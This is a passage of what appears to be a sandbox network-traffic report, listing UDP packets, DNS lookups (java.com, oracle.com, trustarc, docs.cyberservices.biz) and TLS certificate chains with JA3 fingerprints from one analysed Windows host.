May 4, 2021 12:35:11.918560028 CEST	53	55014	8.8.8.8	192.168.2.6
May 4, 2021 12:35:12.352518082 CEST	62208	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:12.407969952 CEST	53	62208	8.8.8.8	192.168.2.6
May 4, 2021 12:35:12.498311043 CEST	57574	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:12.558602095 CEST	53	57574	8.8.8.8	192.168.2.6
May 4, 2021 12:35:13.080090046 CEST	51818	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:13.139060020 CEST	53	51818	8.8.8.8	192.168.2.6
May 4, 2021 12:35:13.360059977 CEST	56628	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:13.411583900 CEST	53	56628	8.8.8.8	192.168.2.6
May 4, 2021 12:35:14.484740019 CEST	60778	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:14.533454895 CEST	53	60778	8.8.8.8	192.168.2.6
May 4, 2021 12:35:16.052036047 CEST	53799	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:16.103458881 CEST	53	53799	8.8.8.8	192.168.2.6
May 4, 2021 12:35:21.470129013 CEST	54683	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:21.523427010 CEST	53	54683	8.8.8.8	192.168.2.6
May 4, 2021 12:35:22.721379042 CEST	59329	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:22.772445917 CEST	53	59329	8.8.8.8	192.168.2.6
May 4, 2021 12:35:25.068948030 CEST	64021	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:25.120423079 CEST	53	64021	8.8.8.8	192.168.2.6
May 4, 2021 12:35:37.459177017 CEST	56129	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:37.509963989 CEST	53	56129	8.8.8.8	192.168.2.6
May 4, 2021 12:35:38.275922060 CEST	58177	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:38.324773073 CEST	53	58177	8.8.8.8	192.168.2.6
May 4, 2021 12:35:38.477729082 CEST	56129	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:38.526303053 CEST	53	56129	8.8.8.8	192.168.2.6
May 4, 2021 12:35:39.286408901 CEST	58177	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:39.335233927 CEST	53	58177	8.8.8.8	192.168.2.6
May 4, 2021 12:35:39.484194040 CEST	56129	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:39.532969952 CEST	53	56129	8.8.8.8	192.168.2.6
May 4, 2021 12:35:40.294672012 CEST	58177	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:40.343445063 CEST	53	58177	8.8.8.8	192.168.2.6
May 4, 2021 12:35:41.346844912 CEST	50700	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:41.404150963 CEST	53	50700	8.8.8.8	192.168.2.6
May 4, 2021 12:35:41.485920906 CEST	56129	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:41.534671068 CEST	53	56129	8.8.8.8	192.168.2.6
May 4, 2021 12:35:42.299045086 CEST	58177	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:42.347779989 CEST	53	58177	8.8.8.8	192.168.2.6
May 4, 2021 12:35:45.338546991 CEST	54069	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:45.395838976 CEST	53	54069	8.8.8.8	192.168.2.6
May 4, 2021 12:35:45.495847940 CEST	56129	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:45.545162916 CEST	53	56129	8.8.8.8	192.168.2.6
May 4, 2021 12:35:46.303634882 CEST	58177	53	192.168.2.6	8.8.8.8
May 4, 2021 12:35:46.352389097 CEST	53	58177	8.8.8.8	192.168.2.6
May 4, 2021 12:36:07.598901033 CEST	61178	53	192.168.2.6	8.8.8.8
May 4, 2021 12:36:07.691679955 CEST	53	61178	8.8.8.8	192.168.2.6
May 4, 2021 12:36:08.565891027 CEST	57017	53	192.168.2.6	8.8.8.8
May 4, 2021 12:36:08.627954006 CEST	53	57017	8.8.8.8	192.168.2.6
May 4, 2021 12:36:11.848285913 CEST	56327	53	192.168.2.6	8.8.8.8
May 4, 2021 12:36:11.909832001 CEST	53	56327	8.8.8.8	192.168.2.6
May 4, 2021 12:36:12.365838051 CEST	50243	53	192.168.2.6	8.8.8.8
May 4, 2021 12:36:12.426707029 CEST	53	50243	8.8.8.8	192.168.2.6
May 4, 2021 12:36:12.986884117 CEST	62055	53	192.168.2.6	8.8.8.8
May 4, 2021 12:36:13.100615025 CEST	53	62055	8.8.8.8	192.168.2.6
May 4, 2021 12:36:13.702367067 CEST	61249	53	192.168.2.6	8.8.8.8
May 4, 2021 12:36:13.983408928 CEST	53	61249	8.8.8.8	192.168.2.6
May 4, 2021 12:36:14.663633108 CEST	65252	53	192.168.2.6	8.8.8.8
May 4, 2021 12:36:14.722049952 CEST	53	65252	8.8.8.8	192.168.2.6
May 4, 2021 12:36:15.026088953 CEST	64367	53	192.168.2.6	8.8.8.8
May 4, 2021 12:36:15.077672958 CEST	53	64367	8.8.8.8	192.168.2.6
May 4, 2021 12:36:15.734752893 CEST	55066	53	192.168.2.6	8.8.8.8
May 4, 2021 12:36:15.791722059 CEST	53	55066	8.8.8.8	192.168.2.6
May 4, 2021 12:36:15.846528053 CEST	60211	53	192.168.2.6	8.8.8.8
May 4, 2021 12:36:15.906477928 CEST	53	60211	8.8.8.8	192.168.2.6
May 4, 2021 12:36:17.532902956 CEST	56570	53	192.168.2.6	8.8.8.8
May 4, 2021 12:36:17.591733932 CEST	53	56570	8.8.8.8	192.168.2.6
May 4, 2021 12:36:18.064133883 CEST	58454	53	192.168.2.6	8.8.8.8
May 4, 2021 12:36:18.124248028 CEST	53	58454	8.8.8.8	192.168.2.6
May 4, 2021 12:36:30.387150049 CEST	55180	53	192.168.2.6	8.8.8.8
May 4, 2021 12:36:30.446480036 CEST	53	55180	8.8.8.8	192.168.2.6
May 4, 2021 12:36:48.599721909 CEST	58721	53	192.168.2.6	8.8.8.8
May 4, 2021 12:36:48.651357889 CEST	53	58721	8.8.8.8	192.168.2.6
May 4, 2021 12:36:50.203682899 CEST	57691	53	192.168.2.6	8.8.8.8
May 4, 2021 12:36:50.275280952 CEST	53	57691	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 4, 2021 12:35:07.517149925 CEST	192.168.2.6	8.8.8.8	0x6c55	Standard query (0)	www.java.com	A (IP address)	IN (0x0001)
May 4, 2021 12:35:08.606442928 CEST	192.168.2.6	8.8.8.8	0x118c	Standard query (0)	www.java.com	A (IP address)	IN (0x0001)
May 4, 2021 12:35:09.115089893 CEST	192.168.2.6	8.8.8.8	0xc981	Standard query (0)	static.oracle.com	A (IP address)	IN (0x0001)
May 4, 2021 12:35:09.460712910 CEST	192.168.2.6	8.8.8.8	0xe107	Standard query (0)	s.go-mpulse.net	A (IP address)	IN (0x0001)
May 4, 2021 12:35:09.903906107 CEST	192.168.2.6	8.8.8.8	0xe144	Standard query (0)	c.go-mpulse.net	A (IP address)	IN (0x0001)
May 4, 2021 12:35:10.380845070 CEST	192.168.2.6	8.8.8.8	0x48b8	Standard query (0)	c.oracleinfinity.io	A (IP address)	IN (0x0001)
May 4, 2021 12:35:10.919177055 CEST	192.168.2.6	8.8.8.8	0x788	Standard query (0)	dc.oracleinfinity.io	A (IP address)	IN (0x0001)
May 4, 2021 12:35:10.938222885 CEST	192.168.2.6	8.8.8.8	0x8357	Standard query (0)	www.oracle.com	A (IP address)	IN (0x0001)
May 4, 2021 12:35:11.071753025 CEST	192.168.2.6	8.8.8.8	0x47be	Standard query (0)	consent.trustarc.com	A (IP address)	IN (0x0001)
May 4, 2021 12:35:11.448997974 CEST	192.168.2.6	8.8.8.8	0x24a7	Standard query (0)	docs.cyberservices.biz	A (IP address)	IN (0x0001)
May 4, 2021 12:35:11.607371092 CEST	192.168.2.6	8.8.8.8	0xd4fb	Standard query (0)	consent-pref.trustarc.com	A (IP address)	IN (0x0001)
May 4, 2021 12:35:11.858181000 CEST	192.168.2.6	8.8.8.8	0xecbe	Standard query (0)	consent-st.trustarc.com	A (IP address)	IN (0x0001)
May 4, 2021 12:35:12.352518082 CEST	192.168.2.6	8.8.8.8	0x34bc	Standard query (0)	oracle.112.2o7.net	A (IP address)	IN (0x0001)
May 4, 2021 12:35:12.498311043 CEST	192.168.2.6	8.8.8.8	0x2db7	Standard query (0)	prefmgr-cookie.truste-svc.net	A (IP address)	IN (0x0001)
May 4, 2021 12:35:13.080090046 CEST	192.168.2.6	8.8.8.8	0x7485	Standard query (0)	684dd30c.akstat.io	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 4, 2021 12:35:07.578546047 CEST	8.8.8.8	192.168.2.6	0x6c55	No error (0)	www.java.com	ds-www.java.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)
May 4, 2021 12:35:08.666438103 CEST	8.8.8.8	192.168.2.6	0x118c	No error (0)	www.java.com	ds-www.java.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)
May 4, 2021 12:35:09.173784018 CEST	8.8.8.8	192.168.2.6	0xc981	No error (0)	static.oracle.com	ds-oracle-microsites.edgekey.net		CNAME (Canonical name)	IN (0x0001)
May 4, 2021 12:35:09.519772053 CEST	8.8.8.8	192.168.2.6	0xe107	No error (0)	s.go-mpulse.net	ip46.go-mpulse.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)
May 4, 2021 12:35:09.962995052 CEST	8.8.8.8	192.168.2.6	0xe144	No error (0)	c.go-mpulse.net	wildcard46.go-mpulse.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)
May 4, 2021 12:35:10.443212986 CEST	8.8.8.8	192.168.2.6	0x48b8	No error (0)	c.oracleinfinity.io	c.oracleinfinity.io.edgekey.net		CNAME (Canonical name)	IN (0x0001)
May 4, 2021 12:35:10.990144014 CEST	8.8.8.8	192.168.2.6	0x788	No error (0)	dc.oracleinfinity.io	dc.oracleinfinity.io.akadns.net		CNAME (Canonical name)	IN (0x0001)
May 4, 2021 12:35:10.999456882 CEST	8.8.8.8	192.168.2.6	0x8357	No error (0)	www.oracle.com	ds-www.oracle.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)
May 4, 2021 12:35:11.134495020 CEST	8.8.8.8	192.168.2.6	0x47be	No error (0)	consent.trustarc.com		13.224.193.90	A (IP address)	IN (0x0001)
May 4, 2021 12:35:11.134495020 CEST	8.8.8.8	192.168.2.6	0x47be	No error (0)	consent.trustarc.com		13.224.193.85	A (IP address)	IN (0x0001)
May 4, 2021 12:35:11.134495020 CEST	8.8.8.8	192.168.2.6	0x47be	No error (0)	consent.trustarc.com		13.224.193.119	A (IP address)	IN (0x0001)
May 4, 2021 12:35:11.134495020 CEST	8.8.8.8	192.168.2.6	0x47be	No error (0)	consent.trustarc.com		13.224.193.60	A (IP address)	IN (0x0001)
May 4, 2021 12:35:11.669842958 CEST	8.8.8.8	192.168.2.6	0xd4fb	No error (0)	consent-pref.trustarc.com		143.204.98.25	A (IP address)	IN (0x0001)
May 4, 2021 12:35:11.669842958 CEST	8.8.8.8	192.168.2.6	0xd4fb	No error (0)	consent-pref.trustarc.com		143.204.98.40	A (IP address)	IN (0x0001)
May 4, 2021 12:35:11.669842958 CEST	8.8.8.8	192.168.2.6	0xd4fb	No error (0)	consent-pref.trustarc.com		143.204.98.13	A (IP address)	IN (0x0001)
May 4, 2021 12:35:11.669842958 CEST	8.8.8.8	192.168.2.6	0xd4fb	No error (0)	consent-pref.trustarc.com		143.204.98.51	A (IP address)	IN (0x0001)
May 4, 2021 12:35:11.702372074 CEST	8.8.8.8	192.168.2.6	0x24a7	No error (0)	docs.cyberservices.biz		50.87.249.219	A (IP address)	IN (0x0001)
May 4, 2021 12:35:11.918560028 CEST	8.8.8.8	192.168.2.6	0xecbe	No error (0)	consent-st.trustarc.com		143.204.98.126	A (IP address)	IN (0x0001)
May 4, 2021 12:35:11.918560028 CEST	8.8.8.8	192.168.2.6	0xecbe	No error (0)	consent-st.trustarc.com		143.204.98.83	A (IP address)	IN (0x0001)
May 4, 2021 12:35:11.918560028 CEST	8.8.8.8	192.168.2.6	0xecbe	No error (0)	consent-st.trustarc.com		143.204.98.35	A (IP address)	IN (0x0001)
May 4, 2021 12:35:11.918560028 CEST	8.8.8.8	192.168.2.6	0xecbe	No error (0)	consent-st.trustarc.com		143.204.98.16	A (IP address)	IN (0x0001)
May 4, 2021 12:35:12.407969952 CEST	8.8.8.8	192.168.2.6	0x34bc	No error (0)	oracle.112.2o7.net		35.181.18.61	A (IP address)	IN (0x0001)
May 4, 2021 12:35:12.407969952 CEST	8.8.8.8	192.168.2.6	0x34bc	No error (0)	oracle.112.2o7.net		15.237.76.117	A (IP address)	IN (0x0001)
May 4, 2021 12:35:12.407969952 CEST	8.8.8.8	192.168.2.6	0x34bc	No error (0)	oracle.112.2o7.net		15.237.136.106	A (IP address)	IN (0x0001)
May 4, 2021 12:35:12.558602095 CEST	8.8.8.8	192.168.2.6	0x2db7	No error (0)	prefmgr-cookie.truste-svc.net		34.202.206.65	A (IP address)	IN (0x0001)
May 4, 2021 12:35:12.558602095 CEST	8.8.8.8	192.168.2.6	0x2db7	No error (0)	prefmgr-cookie.truste-svc.net		3.232.192.25	A (IP address)	IN (0x0001)
May 4, 2021 12:35:12.558602095 CEST	8.8.8.8	192.168.2.6	0x2db7	No error (0)	prefmgr-cookie.truste-svc.net		3.212.50.245	A (IP address)	IN (0x0001)
May 4, 2021 12:35:13.139060020 CEST	8.8.8.8	192.168.2.6	0x7485	No error (0)	684dd30c.akstat.io	wildcard46.akstat.io.edgekey.net		CNAME (Canonical name)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
May 4, 2021 12:35:11.231369972 CEST	13.224.193.90	443	192.168.2.6	49731	CN=*.trustarc.com, O=TrustArc Inc, L=San Francisco, ST=California, C=US CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Thu May 21 19:53:46 CEST 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004	Sun Jul 17 21:03:01 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
					CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031
					CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Wed Jan 01 08:00:00 CET 2014	Fri May 30 09:00:00 CEST 2031
					OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Jun 29 19:06:20 CEST 2004	Thu Jun 29 19:06:20 CEST 2034
May 4, 2021 12:35:11.233447075 CEST	13.224.193.90	443	192.168.2.6	49730	CN=*.trustarc.com, O=TrustArc Inc, L=San Francisco, ST=California, C=US CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Thu May 21 19:53:46 CEST 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004	Sun Jul 17 21:03:01 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
					CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031
					CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Wed Jan 01 08:00:00 CET 2014	Fri May 30 09:00:00 CEST 2031
					OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Jun 29 19:06:20 CEST 2004	Thu Jun 29 19:06:20 CEST 2034
May 4, 2021 12:35:11.758336067 CEST	143.204.98.25	443	192.168.2.6	49732	CN=*.trustarc.com, O=TrustArc Inc, L=San Francisco, ST=California, C=US CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Thu May 21 19:53:46 CEST 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004	Sun Jul 17 21:03:01 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
					CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031
					CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Wed Jan 01 08:00:00 CET 2014	Fri May 30 09:00:00 CEST 2031
					OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Jun 29 19:06:20 CEST 2004	Thu Jun 29 19:06:20 CEST 2034
May 4, 2021 12:35:11.761471987 CEST	143.204.98.25	443	192.168.2.6	49733	CN=*.trustarc.com, O=TrustArc Inc, L=San Francisco, ST=California, C=US CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Thu May 21 19:53:46 CEST 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004	Sun Jul 17 21:03:01 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
					CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031
					CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Wed Jan 01 08:00:00 CET 2014	Fri May 30 09:00:00 CEST 2031
					OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Jun 29 19:06:20 CEST 2004	Thu Jun 29 19:06:20 CEST 2034
May 4, 2021 12:35:12.021081924 CEST	143.204.98.126	443	192.168.2.6	49736	CN=*.trustarc.com, O=TrustArc Inc, L=San Francisco, ST=California, C=US CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Thu May 21 19:53:46 CEST 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004	Sun Jul 17 21:03:01 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
					CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031
					CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Wed Jan 01 08:00:00 CET 2014	Fri May 30 09:00:00 CEST 2031
					OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Jun 29 19:06:20 CEST 2004	Thu Jun 29 19:06:20 CEST 2034
May 4, 2021 12:35:12.021231890 CEST	143.204.98.126	443	192.168.2.6	49737	CN=*.trustarc.com, O=TrustArc Inc, L=San Francisco, ST=California, C=US CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Thu May 21 19:53:46 CEST 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004	Sun Jul 17 21:03:01 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
					CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031
					CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Wed Jan 01 08:00:00 CET 2014	Fri May 30 09:00:00 CEST 2031
					OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Jun 29 19:06:20 CEST 2004	Thu Jun 29 19:06:20 CEST 2034
May 4, 2021 12:35:12.519993067 CEST	35.181.18.61	443	192.168.2.6	49738	CN=*.112.2o7.net, O=Adobe Systems Incorporated, L=San Jose, ST=California, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Apr 14 02:00:00 CEST 2021 Thu Sep 24 02:00:00 CEST 2020 Fri Nov 10 01:00:00 CET 2006	Thu Apr 21 01:59:59 CEST 2022 Tue Sep 24 01:59:59 CEST 2030 Mon Nov 10 01:00:00 CET 2031	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
					CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030
					CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Nov 10 01:00:00 CET 2006	Mon Nov 10 01:00:00 CET 2031
